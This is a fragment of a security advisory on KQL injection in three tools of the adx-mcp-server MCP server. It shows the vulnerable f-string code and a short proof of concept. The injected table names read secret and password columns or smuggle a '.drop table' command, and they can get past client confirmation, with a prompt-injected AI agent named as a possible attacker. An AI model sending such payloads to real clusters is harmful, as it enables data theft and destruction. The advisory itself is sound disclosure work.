+ "details": "### Summary\n\nadx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.\n\n### Details\n\nThe MCP tools construct KQL queries by directly embedding the `table_name` parameter into query strings:\n\n**Vulnerable code** ([permalink](https://github.com/pab1it0/adx-mcp-server/blob/48b2933/src/adx_mcp_server/server.py#L228)):\n\n```python\n@mcp.tool(...)\nasync def get_table_schema(table_name: str) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | getschema\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | sample {sample_size}\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def get_table_details(table_name: str) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\".show table {table_name} details\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\nKQL allows chaining query operators with `|` and executing management commands prefixed with `.`. An attacker can inject:\n- `sensitive_table | project Secret, Password | take 100 //` to read arbitrary tables\n- Newline-separated management commands like `.drop table important_data` via `get_table_details`\n- Arbitrary KQL analytics queries via any of the three tools\n\n**Note:** While the server also has an `execute_query` tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to \"safe\" tools while requiring confirmation for `execute_query`. The injection bypasses this trust boundary.\n\n### PoC\n\n```python\n# PoC: KQL Injection via get_table_schema tool\n# The table_name parameter is injected into: f\"{table_name} | getschema\"\n\nimport json\n\n# MCP tool call that exfiltrates data from a sensitive table\ntool_call = {\n \"name\": \"get_table_schema\",\n \"arguments\": {\n \"table_name\": \"sensitive_data | project Secret, Password | take 100 //\"\n }\n}\nprint(json.dumps(tool_call, indent=2))\n\n# Resulting KQL: \"sensitive_data | project Secret, Password | take 100 // | getschema\"\n# The // comments out \"| getschema\", executing an arbitrary data query instead\n\n# Destructive example via get_table_details:\ntool_call_destructive = {\n \"name\": \"get_table_details\",\n \"arguments\": {\n \"table_name\": \"users details\\n.drop table critical_data\"\n }\n}\n# Resulting KQL:\n# .show table users details\n# .drop table critical_data details\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments